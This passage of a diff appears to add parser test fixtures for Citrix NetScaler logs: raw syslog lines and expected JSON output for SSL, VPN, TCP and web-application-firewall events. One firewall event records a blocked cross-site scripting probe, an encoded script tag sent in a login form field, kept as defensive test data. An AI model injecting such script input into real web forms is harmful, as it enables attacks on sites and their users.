+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : BOT BOT_SIG_AUTO_UPDATE 4471 0 : Bot New Signature Available. Newly added Rules: 5 DeletedRules: 2
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PITBOSS 4471 0 : Adding pitboss watch on (1024)
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PITBOSS 4471 0 : Deleting watch on (2048)
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PB_SYSTEM_RESTART 4471 0 : proc (4096) (DatabaseService) has had its maximum number of restarts (3), rebooting the system
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : PITBOSS PB_PROCESS_RESTART 4471 0 : Restarting process old pid (8192) action (respawn)
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 37819 0 : SPCBId 3376175 - ClientIP 1.128.0.1 - ClientPort 2357 - VserverServiceIP 1.128.0.2 - VserverServicePort 443 - ClientVersion TLSv1.3 - CipherSuite "TLS1.3-AES256-GCM-SHA384" - Session New - HandshakeTime 55 ms
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 37819 0 : Backend SPCBId 3376176 - ServerIP 10.10.41.205 - ServerPort 8443 - ProtocolVersion TLSv1.2 - CipherSuite "TLS1.2-ECDHE-RSA-AES256-GCM-SHA384" - Session New - SERVER_AUTHENTICATED -SerialNumber "12CF1F64F01429F7" - SignatureAlgorithm "sha256WithRSAEncryption" - ValidFrom "Apr 20 07:46:28 2023 GMT" - ValidTo "May 1 20:22:03 2024 GMT" - HandshakeTime 8 ms
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : default SSLLOG SSL_HANDSHAKE_ISSUERNAME 39207 0 : SPCBId 3376283 - IssuerName " C=US,ST=Arizona,L=Scottsdale,O=GoDaddy.com, Inc.,OU=http://crts.godaddy.com/repository/,CN=Go Daddy Secure Certificate Authority - G2"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : default SSLLOG SSL_HANDSHAKE_FAILURE 31626 0 : SPCBId 2558141 - ClientIP 1.128.0.0 - ClientPort 54686 - VserverServiceIP 1.128.0.1 - VserverServicePort 443 - ClientVersion TLSv1.0 - CipherSuite "NA"Session New - Reason "Wrong protocol version in the message"
+Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN HTTPREQUEST 4471 0 : Context someusername@1.128.0.0 - SessionId: 12690921 - example.domain.com User someusername : Group(s) N/A : Vserver 1.128.0.1:443 - 2022/06/14:16:07:48 : SSO is ON : GET /Citrix/Redacted/URL/Path - -
+Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN HTTPREQUEST 4471 0 : Context another.email@company.com@1.128.0.0- SessionId: 104248- some-domain.company.com User some.email@company.com : Group(s) N/A : Vserver 1.128.0.1:443 - 07/07/2022:11:22:00 GMT POST /Some/Url/Concealed - -
+Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN ICAEND_CONNSTAT 4471 0 : Source 1.128.0.0:54547 - Destination 1.128.0.1:444 - SSLRelayAddress 1.128.0.2:2598 - customername - username:domainname someusername:example.domain.com - startTime "2022/06/14:16:17:51" - endTime "2022/06/14:16:18:18" - Duration 00:00:27 - Total_bytes_send 193250 - Total_bytes_recv 36983 - Total_compressedbytes_send 0 - Total_compressedbytes_recv 0 - Compression_ratio_send 0.00% - Compression_ratio_recv 0.00% - connectionId 2812c48 - Total_bytes_wire_send 8028915850309104489 - Total_bytes_wire_recv 8320800952261094732
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : UI CMD_EXECUTED 4471 0 : User jane.doe - ADM_User john - Remote_ip 192.168.1.105 - Command "scp file.txt" - Status "Success"
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REST_VALIDATION 4471 0 : Rest Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234
+Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REST_VALIDATION 4471 0 : gRPC Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234
diff --git a/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log-expected.json b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log-expected.json
new file mode 100644
index 00000000000..00fcf0a468e
--- /dev/null
+++ b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log-expected.json
@@ -0,0 +1,8517 @@ +{ + "expected": [ + { + "@timestamp": "2015-06-22T19:14:37.000Z", + "citrix": { + "cef_format": false, + "default_class": true, + "detail": "06/22/2015:19:14:37 GMT ns 0-PPE-1 : default APPFW APPFW_cross-site scripting 60 0 : 175.16.199.1 616-PPE1 y/3upt2K8ySWWId3Kavbxyni7Rw0000 pr_ffc http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=12345&drinking_pref=on&text_area=%3Cscript%3E%0D%0A&loginButton=ClickToLogin&as_sfid=AAAAAAWEXcNQLlSokNmqaYF6dvfqlChNzSMsdyO9JXOJomm2vBwAMOqZIChv21EcgBc3rexIUcfm0vckKlsgoOeC_BArx1Ic4NLxxkWMtrJe4H7SOfkiv9NL7AG4juPIanTvVo%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c Cross-site script check failed for field text_area=\"Bad tag: script\" ", + "device_event_class_id": "APPFW", + "extended": { + "message": "175.16.199.1 616-PPE1 y/3upt2K8ySWWId3Kavbxyni7Rw0000 pr_ffc http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=12345&drinking_pref=on&text_area=%3Cscript%3E%0D%0A&loginButton=ClickToLogin&as_sfid=AAAAAAWEXcNQLlSokNmqaYF6dvfqlChNzSMsdyO9JXOJomm2vBwAMOqZIChv21EcgBc3rexIUcfm0vckKlsgoOeC_BArx1Ic4NLxxkWMtrJe4H7SOfkiv9NL7AG4juPIanTvVo%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c Cross-site script check failed for field text_area=\"Bad tag: script\" " + }, + "facility": "local0", + "host": "ns", + "name": "APPFW_cross-site scripting", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "175.16.199.1 616-PPE1 y/3upt2K8ySWWId3Kavbxyni7Rw0000 pr_ffc http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=12345&drinking_pref=on&text_area=%3Cscript%3E%0D%0A&loginButton=ClickToLogin&as_sfid=AAAAAAWEXcNQLlSokNmqaYF6dvfqlChNzSMsdyO9JXOJomm2vBwAMOqZIChv21EcgBc3rexIUcfm0vckKlsgoOeC_BArx1Ic4NLxxkWMtrJe4H7SOfkiv9NL7AG4juPIanTvVo%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c Cross-site script check failed for field text_area=\"Bad tag: script\" " + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + 
"country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "60", + "original": "Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : default APPFW APPFW_cross-site scripting 60 0 : 175.16.199.1 616-PPE1 y/3upt2K8ySWWId3Kavbxyni7Rw0000 pr_ffc http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=12345&drinking_pref=on&text_area=%3Cscript%3E%0D%0A&loginButton=ClickToLogin&as_sfid=AAAAAAWEXcNQLlSokNmqaYF6dvfqlChNzSMsdyO9JXOJomm2vBwAMOqZIChv21EcgBc3rexIUcfm0vckKlsgoOeC_BArx1Ic4NLxxkWMtrJe4H7SOfkiv9NL7AG4juPIanTvVo%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c Cross-site script check failed for field text_area=\"Bad tag: script\" ", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2017-12-04T17:21:00.000Z", + "citrix": { + "cef_format": false, + "detail": "12/04/2017:17:21:00 GMT citrix.netscaler.test 0-PPE-1 : SSLLOG SSL_HANDSHAKE_SUCCESS 5743593 0 : SPCBId 87630 - ClientIP 172.25.184.157 - ClientPort 19849 - VserverServiceIP 10.254.14.94 - VserverServicePort 443 - ClientVersion TLSv1.2 - CipherSuite \"RC4-MD5 TLSv1.2 Non-Export 128-bit\" - Session Reuse", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "SPCBId 87630 - ClientIP 172.25.184.157 - ClientPort 19849 - VserverServiceIP 10.254.14.94 - VserverServicePort 443 - ClientVersion TLSv1.2 - CipherSuite \"RC4-MD5 TLSv1.2 Non-Export 128-bit\" - Session Reuse" + }, + "facility": "local0", + "host": "citrix.netscaler.test", + "name": "SSL_HANDSHAKE_SUCCESS", + "priority": "info" + }, + "citrix_adc": { + 
"log": { + "cipher_suite": "RC4-MD5 TLSv1.2 Non-Export 128-bit", + "client_ip": "172.25.184.157", + "client_port": 19849, + "client_version": "TLSv1.2", + "message": "SPCBId 87630 - ClientIP 172.25.184.157 - ClientPort 19849 - VserverServiceIP 10.254.14.94 - VserverServicePort 443 - ClientVersion TLSv1.2 - CipherSuite \"RC4-MD5 TLSv1.2 Non-Export 128-bit\" - Session Reuse", + "session": "Reuse", + "spcb_id": "87630", + "vserver": { + "ip": "10.254.14.94", + "port": 443 + } + } + }, + "client": { + "ip": "172.25.184.157", + "port": 19849 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "5743593", + "original": "Jun 22 19:14:37 81.2.69.144 12/04/2017:17:21:00 GMT citrix.netscaler.test 0-PPE-1 : SSLLOG SSL_HANDSHAKE_SUCCESS 5743593 0 : SPCBId 87630 - ClientIP 172.25.184.157 - ClientPort 19849 - VserverServiceIP 10.254.14.94 - VserverServicePort 443 - ClientVersion TLSv1.2 - CipherSuite \"RC4-MD5 TLSv1.2 Non-Export 128-bit\" - Session Reuse", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "10.254.14.94", + "172.25.184.157" + ] + }, + "server": { + "ip": "10.254.14.94", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "cipher": "RC4-MD5 TLSv1.2 Non-Export 128-bit", + "version": "1.2", + "version_protocol": "TLS" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.10.10:52187 - Vserver 81.2.69.144:80 - NatIP 192.168.10.10:52187 - Destination 81.2.69.144:80 - Delink Time 10/06/2014:14:03:23 GMT - Total_bytes_send 1075 - Total_bytes_recv 352", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 192.168.10.10:52187 - Vserver 81.2.69.144:80 - NatIP 192.168.10.10:52187 - 
Destination 81.2.69.144:80 - Delink Time 10/06/2014:14:03:23 GMT - Total_bytes_send 1075 - Total_bytes_recv 352" + }, + "facility": "local0", + "host": "ns1", + "name": "CONN_DELINK", + "priority": "info" + }, + "citrix_adc": { + "log": { + "delink_time": "2014-10-06T14:03:23.000Z", + "delink_timezone": "GMT", + "destination": { + "ip": "81.2.69.144", + "port": 80 + }, + "message": "Source 192.168.10.10:52187 - Vserver 81.2.69.144:80 - NatIP 192.168.10.10:52187 - Destination 81.2.69.144:80 - Delink Time 10/06/2014:14:03:23 GMT - Total_bytes_send 1075 - Total_bytes_recv 352", + "nat": { + "ip": "192.168.10.10", + "port": 52187 + }, + "source": { + "ip": "192.168.10.10", + "port": 52187 + }, + "total_bytes_received": 352, + "total_bytes_send": 1075, + "vserver": { + "ip": "81.2.69.144", + "port": 80 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 352, + "ip": "81.2.69.144", + "port": 80 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2014-10-06T14:03:23.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.10.10:52187 - Vserver 81.2.69.144:80 - NatIP 192.168.10.10:52187 - Destination 81.2.69.144:80 - Delink Time 10/06/2014:14:03:23 GMT - Total_bytes_send 1075 - Total_bytes_recv 352", + "severity": 0, + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.10.10", + "81.2.69.144" + ] + }, + "server": { + "ip": "81.2.69.144", + "port": 80 + }, + "source": { + "bytes": 1075, + "ip": "192.168.10.10", + "nat": { + "ip": 
"192.168.10.10", + "port": 52187 + }, + "port": 52187 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:30.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4472 0 : Source 192.168.10.35:80 - Destination 192.168.10.51:35341 - Start Time 10/06/2014:14:02:43 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 192.168.10.35:80 - Destination 192.168.10.51:35341 - Start Time 10/06/2014:14:02:43 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1" + }, + "facility": "local0", + "host": "ns1", + "name": "CONN_TERMINATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "destination": { + "ip": "192.168.10.51", + "port": 35341 + }, + "end_time": "2014-10-06T14:03:30.000Z", + "end_time_timezone": "GMT", + "message": "Source 192.168.10.35:80 - Destination 192.168.10.51:35341 - Start Time 10/06/2014:14:02:43 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "source": { + "ip": "192.168.10.35", + "port": 80 + }, + "start_time": "2014-10-06T14:02:43.000Z", + "start_time_timezone": "GMT", + "total_bytes_received": 1, + "total_bytes_send": 1 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 1, + "ip": "192.168.10.51", + "port": 35341 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2014-10-06T14:03:30.000Z", + "id": "4472", + "original": "Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4472 0 : Source 
192.168.10.35:80 - Destination 192.168.10.51:35341 - Start Time 10/06/2014:14:02:43 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "severity": 0, + "start": "2014-10-06T14:02:43.000Z", + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.10.35", + "192.168.10.51", + "81.2.69.144" + ] + }, + "source": { + "bytes": 1, + "ip": "192.168.10.35", + "port": 80 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:30.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4473 0 : Source 127.0.0.1:7776 - Destination 127.0.0.2:55623 - Start Time 10/06/2014:14:02:45 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 127.0.0.1:7776 - Destination 127.0.0.2:55623 - Start Time 10/06/2014:14:02:45 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1" + }, + "facility": "local0", + "host": "ns1", + "name": "CONN_TERMINATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "destination": { + "ip": "127.0.0.2", + "port": 55623 + }, + "end_time": "2014-10-06T14:03:30.000Z", + "end_time_timezone": "GMT", + "message": "Source 127.0.0.1:7776 - Destination 127.0.0.2:55623 - Start Time 10/06/2014:14:02:45 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "source": { + "ip": "127.0.0.1", + "port": 7776 + }, + "start_time": "2014-10-06T14:02:45.000Z", + "start_time_timezone": "GMT", + "total_bytes_received": 1, + "total_bytes_send": 1 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 
51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 1, + "ip": "127.0.0.2", + "port": 55623 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2014-10-06T14:03:30.000Z", + "id": "4473", + "original": "Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4473 0 : Source 127.0.0.1:7776 - Destination 127.0.0.2:55623 - Start Time 10/06/2014:14:02:45 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "severity": 0, + "start": "2014-10-06T14:02:45.000Z", + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "127.0.0.1", + "127.0.0.2", + "81.2.69.144" + ] + }, + "source": { + "bytes": 1, + "ip": "127.0.0.1", + "port": 7776 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:30.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4474 0 : Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1" + }, + "facility": "local0", + "host": "ns1", + "name": "CONN_TERMINATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "destination": { + "ip": "127.0.0.2", + "port": 39771 + }, + "end_time": "2014-10-06T14:03:30.000Z", + "end_time_timezone": "GMT", + "message": "Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 
10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "source": { + "ip": "127.0.0.1", + "port": 80 + }, + "start_time": "2014-10-06T14:02:46.000Z", + "start_time_timezone": "GMT", + "total_bytes_received": 1, + "total_bytes_send": 1 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 1, + "ip": "127.0.0.2", + "port": 39771 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2014-10-06T14:03:30.000Z", + "id": "4474", + "original": "Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4474 0 : Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1", + "severity": 0, + "start": "2014-10-06T14:02:46.000Z", + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "127.0.0.1", + "127.0.0.2", + "81.2.69.144" + ] + }, + "source": { + "bytes": 1, + "ip": "127.0.0.1", + "port": 80 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2022/06/14:16:05:04 GMT - Total_bytes_send 102400 - Total_bytes_recv 204800", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 
- Delink Time 2022/06/14:16:05:04 GMT - Total_bytes_send 102400 - Total_bytes_recv 204800" + }, + "facility": "local0", + "host": "ns1", + "name": "CONN_DELINK", + "priority": "info" + }, + "citrix_adc": { + "log": { + "delink_time": "2022-06-14T16:05:04.000Z", + "delink_timezone": "GMT", + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "message": "Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2022/06/14:16:05:04 GMT - Total_bytes_send 102400 - Total_bytes_recv 204800", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "source": { + "ip": "192.168.1.100", + "port": 12345 + }, + "total_bytes_received": 204800, + "total_bytes_send": 102400, + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 204800, + "ip": "1.128.0.0", + "port": 80 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2022-06-14T16:05:04.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2022/06/14:16:05:04 GMT - Total_bytes_send 102400 - Total_bytes_recv 204800", + "severity": 0, + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "source": { + "bytes": 102400, + "ip": "192.168.1.100", + "nat": { + "ip": "1.128.0.0", + 
"port": 1024 + }, + "port": 12345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - Start Time 2023-04-01T11:00:00Z - End Time 2023-04-01T11:05:00Z - Total_bytes_send 51200 - Total_bytes_recv 102400", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - Start Time 2023-04-01T11:00:00Z - End Time 2023-04-01T11:05:00Z - Total_bytes_send 51200 - Total_bytes_recv 102400" + }, + "facility": "local0", + "host": "ns1", + "name": "CONN_TERMINATE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "end_time": "2023-04-01T11:05:00.000Z", + "message": "Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - Start Time 2023-04-01T11:00:00Z - End Time 2023-04-01T11:05:00Z - Total_bytes_send 51200 - Total_bytes_recv 102400", + "source": { + "ip": "192.168.1.100", + "port": 12345 + }, + "start_time": "2023-04-01T11:00:00.000Z", + "total_bytes_received": 102400, + "total_bytes_send": 51200 + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 102400, + "ip": "1.128.0.0", + "port": 80 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "end": "2023-04-01T11:05:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - Start Time 2023-04-01T11:00:00Z - End 
Time 2023-04-01T11:05:00Z - Total_bytes_send 51200 - Total_bytes_recv 102400", + "severity": 0, + "start": "2023-04-01T11:00:00.000Z", + "timezone": "GMT", + "type": [ + "end", + "connection" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "bytes": 51200, + "ip": "192.168.1.100", + "port": 12345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP OTHERCONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2023-04-01T12:00:00Z GMT Total_bytes_send 51200 - Total_bytes_recv 102400", + "device_event_class_id": "TCP", + "extended": { + "message": "Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2023-04-01T12:00:00Z GMT Total_bytes_send 51200 - Total_bytes_recv 102400" + }, + "facility": "local0", + "host": "ns1", + "name": "OTHERCONN_DELINK", + "priority": "info" + }, + "citrix_adc": { + "log": { + "delink_time": "2023-04-01T12:00:00.000Z", + "delink_timezone": "GMT", + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "message": "Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2023-04-01T12:00:00Z GMT Total_bytes_send 51200 - Total_bytes_recv 102400", + "nat": { + "ip": "1.128.0.0", + "port": 1024 + }, + "source": { + "ip": "192.168.1.100", + "port": 12345 + }, + "total_bytes_received": 102400, + "total_bytes_send": 51200, + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", 
